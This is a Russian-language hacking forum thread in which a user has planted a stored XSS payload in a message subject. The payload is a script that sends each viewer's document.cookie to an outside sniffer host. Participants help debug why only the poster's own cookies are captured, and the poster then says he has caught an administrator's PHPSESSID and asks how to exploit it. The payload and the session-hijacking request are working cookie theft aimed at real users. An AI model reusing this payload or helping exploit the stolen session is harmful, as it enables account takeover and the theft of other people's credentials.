Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>

Хм, наверное потому что пока только ты просмотрел эту тему

"http://s.netsec.ru/mda.gif?"
вместо mda.gif впиши свой_ник.gif

я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят

Сомневаюсь в подобном раскладе. Если они все таки заходят, то не может быть в принципе что твои приходят, а их нет.

я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят
А ты недумал что в некоторвх браузерах XSS непашет :)

Дык не на одном человеке проверял, у всех непохать не может))))

наконецто поймал кукисы но тут возник другой вопрос, поймал PHPSESSID админа через инеткрэк послал пакет , посмотрел его страницу в инет креке, как я могу это использовать?в кукисах PHPSESSID не нахожу, они создаются тока когда ставишь галочку на "запомнить мнея" в виде login- xxxx pass-md5(xxx) а PHPSESSID нету...